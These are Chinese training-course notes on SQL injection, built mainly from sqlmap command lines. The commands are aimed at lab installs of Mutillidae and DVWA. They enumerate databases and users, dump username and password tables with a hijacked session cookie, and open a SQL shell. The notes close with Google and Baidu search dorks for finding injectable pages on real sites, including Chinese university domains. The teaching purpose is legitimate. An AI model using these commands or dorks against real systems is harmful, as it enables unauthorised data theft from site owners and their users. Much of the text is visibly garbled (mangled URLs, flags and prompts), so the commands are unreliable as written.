开发者学堂课程【网络安全攻防 - Web渗透测试:SQL 注入攻击_7】学习笔记,与课程紧密联系,让用户快速学习知识。
课程地址:https://developer.aliyun.com/learning/course/630/detail/9910
SQL 注入攻击_7
内容介绍
一、 GET 方法注入
二、 POST 方法注入
三、 数据获取
四、 提权操作
五、 综合实例
一、 GET 方法注入
1. //获取所有数据库
rootekali:~#sqlmap-u "http://192.168.106.134/mutillidae/index.php?page=user-
info.php&username-yangge&password-1238user-info-php-submit-button-=View+Account+Details"-dbs
2. //获得所有用户
root@kali:~#sqlmap-u
“
http://192.168.106.134/mutillidae/index.php?page=user-
info.php&username-yangge&password-123&user-info-php-submit-button=View+Account+Details”--us
3. //获得当前用户
root@kali:-# sqlmap -u "http://192.168.106.134/mutillidae/index .php?page=user-info.php&username=yangge&password-123&user-info-php-submit-button=View-Account+Details
”current-user
4. sqlmap 参数解析
--users
--current-user
--dbs
--current-db
-D "database_name" --tables
-D "database_name" -T "table_name" --columns
--dump-all
--dump-all --exclude-sysdbs
-D "database_name" -T "table_name" --dump
-D "database_name" --tables
-D "database_name" -T "table_name" --columns
--batch
//--batch:非交互模式,运行过程中的所有提示均自动采用默认选项,无需人工确认
5. 示例步骤:
1) 获得当前数据库
root@kali:# sqlmap -u “
http://192.168.106.134/mutillidae/index.php?page=use-info.php?username=yangge&password=1238user-info-php-submit-button=
View+Account+Details”\--batch--current-db
2) 获得数据库表
root@kali:~# sqlmap -u “
http://192.168.106.134/mutillidae/index
php?page-user-info.php&username=yangge&password=123&user-info-php-submit-button=View+Account +Details”\--batch -D nowasp --tables
3) 获得表的字段
root@kali:~# sqlmap -u
”
http://192.168
1
34/mutillidae/index.php?page-user-info.php&username=eee&password info-php-submit-button=View+Account+Detalls
”
--batch -D nowasp -T accounts --columns
4) 获得表中的数据
root@kali:~# sqlmap -u"http://192.168.166.134/mut1llidae/index.php?page-user-info.php&username-eee&password=eee&user-info-php-submit-button=View+Account+Details--batch -D nowasp -T accounts -C "username, password" --dump
二、 POST 方法注入
1. 对于需要携带 cookie 才能访问的注入页面,使用 --cookie="..." 传入当前会话的 cookie
root@kali:~# sqlmap -u
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id=18Submit=Submit#
\--cookie-
“PHPSESSID-10jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids-swingset,jotto,phpbb2,rednine;acgroupswithpersist-nada"--batc
h
2. root@kali:~# sqlmap -u“
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#
”\--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -p id
3. root@kali:~# sqlmap -uhttp://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#--cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1; \
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch --users
4. root@kali:~# sqlmap -u“
http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-18Submit=Submit#"--cookie="PHPSESSID-i0jcqf4uhd68qujcof3n322e95;securitylow;showhints=1;
\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada"--batch --current-user
三、 数据获取
1. --users
--current-user
--dbs
--current-db
-D
"database_name" --tables
-D
"database_name" -T "table_name" --columns
--dump-all
--dump-all --exclude-sysdbs
-D "database_name" -T "table_name" -C "username,password" --dump
2. root@kali
:~# sqlmap -u
showhints=1;acopendivids=swingset,jotto,phpbb2,redmine;acgro thpersist-nada” --batchusers
3. root@kali:~# sqlmap -u "http://92.168.106.134/6
ea ilities/sqli/?id-18Submit-Submit#
”--cookie="PHPSESSID=10jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada”-- batch --current-db
4. root@kali:~# sqlmap
-u"httpi//192.168.106.134/dvwa/vulnerabilities/sq11/?id=18Submit-Submit#
”-cookie-"PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security=low;showhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D
“dvwa”--tables
5. root@kali:~# sqlmap
-u"http://192.168.106.134/dvwa/vulnerabilities/sqli/?id-1&Submit-Submit#"cookie="PHPSESSID=i0jcqf4uhd68qujcof3n322e95;security-1ow;showhint5-1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada"--batch -D "dvwa"-T"users”--columns
6. root@kali:~# sqlmap -u
"http://192.168.106.134/dvwa/vulnerabilities/sq11/?1d-185ubmit-Submdtcookie-"PHPSESSID-10jcqf4uhd68qujcof3n322e95;security-low; showhints
acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D "dvwa" -T users" -C "username,password"--dump
7. root@kali:~# sqlmap -u
“
http://192.168.106.134/dvwa/vulnerabilities/sq1i/?1d-185ubmit=Submit#
”-cookie=”PHPSESSID=i0jcqf4uhd68qujcof3n322e95;secunitv=low:showhints=1;\
acopendivids-swingset,jotto,phpbb2,redmine;acgroupswithpersist-nada" --batch -D”dvwa” -T “users"--dump
四、 提权操作
//--sql-shell:进入交互式 SQL shell,可直接与数据库交互
rootfkali:~# sqlmap -u
http://192.168.106.134/dvwa/vuinerabilities/sqli/?id=1&Submit=Submit#
-cookie="PHPSES5ID=i0jcqf4uhd68qujcof3n322e95;security=low;shouhints=1;\
acopendivids=swingset,jotto,phpbb2,redmine;acgroupswithpersist=nada" --batch --sql-shell
五、 综合实例
1. 通过 Google 搜索可能存在注入的页面
inurl:.php?id
inurl:.jsp?id
inurl:.asp?id=
inurl:/admin/login.php
inurl:.php?id- intitle:
美女
2. 通过百度搜索可能存在注入的页面
inurl:news.asp?id= site:edu.cn
inurl:news.php?id= site;edu.cn
inurl:news.aspx?id= site;edu.cn